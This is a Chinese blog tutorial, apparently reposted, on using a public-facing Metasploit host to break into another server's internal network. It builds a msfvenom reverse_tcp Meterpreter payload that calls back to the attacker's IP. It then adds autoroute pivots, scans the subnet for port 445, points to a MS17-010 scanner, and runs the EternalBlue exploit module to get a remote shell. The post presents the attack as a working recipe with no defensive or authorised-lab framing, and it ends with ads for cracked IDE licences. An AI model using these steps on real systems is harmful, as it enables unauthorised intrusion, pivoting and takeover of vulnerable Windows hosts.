大家好,又见面了,我是你们的朋友全栈君。
前言
其实很多小白在对利用msf进行ms17010攻击的时候总是不成功,其实这都是因为网上大部分的文章都是写的内网对内网(192.168.1.2–>192.168.1.3)这样的案例,今天写了一下利用公网的MSF直接攻击其他服务器内网的案例。
准备工作
1.安装了Msf的公网主机+Ubuntu系统
2.一台其他服务器内网存在445漏洞
3.细心,细心,细心,钻研,钻研!!!
开始第一步:公网主机操作
生成msf木马:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=你的IP LPORT=6666 -f exe > /var/www/html/6666.exe
Msf监听端口:6666
可以看到,图中获取到了shell!
添加路由
第一步:run get_local_subnets (获取当前路由)
第二步:run autoroute -s 192.168.3.0/24 (添加路由)
第三步:run autoroute -p (查看已添加路由)
使用Payload进行攻击
第一步:background(转换到后台)
第二步:use scanner/portscan/tcp (先扫描开放445端口的PC)
第三步:exploit(开始扫描)
.
注意:扫描出来开放了445端口的PC,不一定就存在445漏洞。(如何精准定位?)
如何列出那些存在445漏洞的PC?
MS_17_010_Scan.zip:https://bbs.ichunqiu.com/thread-40308-1-1.html
描述:
工具的使用步骤如下:
解压后在命令行下执行MS_17_010_Scan.exe,支持-ip 和-file两种参数。
-ip参数可以指定IP扫描,同时支持IP段扫描:
MS_17_010_Scan.exe -ip 192.168.44.129
MS_17_010_Scan.exe -ip 192.168.44.129 192.168.44.133
-file参数支持从文件读取IP列表进行扫描:
MS_17_010_Scan.exe -file ip.txt
工具将显示检测结果:如不存在风险将显示NOT Found Vuln,如存在风险将显示Found Vuln MS17-010及目标电脑的操作系统版本,如果IP地址无效或者漏洞端口未开则显示Exception。
输出结果同时保存在当前目录的result.txt中。
上面的工具也可以在webshell中使用,只需要把结果输出到 txt文档中即可。(例如:MS_17_010_Scan.exe -ip 192.168.44.129 >>jieguo.txt)
攻击正式开始
第一步:use exploit/windows/smb/ms17_010_eternalblue(切换到攻击模块)
第二步:set rhost 192.168.3.38(设置存在445漏洞的PC电脑IP)
第三步:exploit(执行攻击)
第四步:攻击完成,并且自动返回一个shell控制台
发布者:全栈程序员-用户IM,转载请注明出处:https://javaforall.cn/138607.html原文链接:https://javaforall.cn
【正版授权,激活自己账号】: Jetbrains全家桶Ide使用,1年售后保障,每天仅需1毛
【官方授权 正版激活】: 官方授权 正版激活 支持Jetbrains家族下所有IDE 使用个人JB账号...